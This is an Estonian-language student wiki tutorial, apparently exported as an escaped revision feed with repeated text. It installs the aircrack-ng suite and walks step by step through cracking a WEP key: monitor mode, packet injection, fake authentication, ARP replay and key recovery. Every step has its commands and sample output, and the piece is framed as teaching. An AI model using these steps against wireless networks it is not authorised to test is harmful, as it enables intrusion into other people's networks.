&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-9 - “süstimise” test&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-e teddy – raadiovõrgu nimi&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-c 9 – raadiovõrgu kanal&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-1 – võlts autentimine&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;0 – kordusühendus(t)e aeg sekundites&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
&#039;&#039;-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on lihtne ja käepärane vahend, millega lahti murda ilma suurema vaevata WiFi-võrkude paroole. Õppe-eesmärgil on kindlasti vägagi asjakohane antud tööriistaga tutvust teha, sest üpris kiirelt saab selgeks, kuivõrd lihtne on tegelikult kellegi koduvõrku tungida manipuleerides andmepakettidega ja kasutades selleks vaid ~15 käsku.&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&amp;lt;br&amp;gt;&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89363</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89363"/>
		<updated>2015-05-26T08:57:41Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* Üldkirjeldus */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit, demonstreerides üht näitelahendust.&lt;br /&gt;
&lt;br /&gt;
==Üldkirjeldus==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm&amp;lt;ref&amp;gt;[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#description Description]&amp;lt;/ref&amp;gt;. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu&amp;lt;ref&amp;gt;[https://web.archive.org/web/20120805024038/http://www.grape-info.com/doc/linux/config/aircrack-ng-0.6.html Aircrack-ng (WEP, WPA-PSK Crack)]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine&amp;lt;ref&amp;gt;[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#usage Usage]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine&amp;lt;ref&amp;gt;[https://wiki.debian.org/HowToIdentifyADevice/PCI PCI ]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks&amp;lt;ref&amp;gt;[http://www.cyberciti.biz/faq/linux-list-network-cards-command/ HowTo: Linux Show List Of Network Cards]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt&amp;lt;ref&amp;gt;[http://askubuntu.com/questions/294651/step-by-step-guide-to-install-aircrack-ng-suite-on-ubuntu-12-04-lts Step by Step guide to install aircrack-ng suite on ubuntu 12.04 LTS [duplicate]]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]&amp;lt;/ref&amp;gt;: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]&amp;lt;/ref&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]&amp;lt;/ref&amp;gt;:&amp;lt;br&amp;gt;&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liides:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Märge:&#039;&#039;&#039; Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;airmon-ng stop athX&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav &#039;&#039;airmon-ng stop ath0&#039;&#039; käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kontrolli:&#039;&#039;&#039; Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-9 - “süstimise” test&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-e teddy – raadiovõrgu nimi&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-c 9 – raadiovõrgu kanal&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
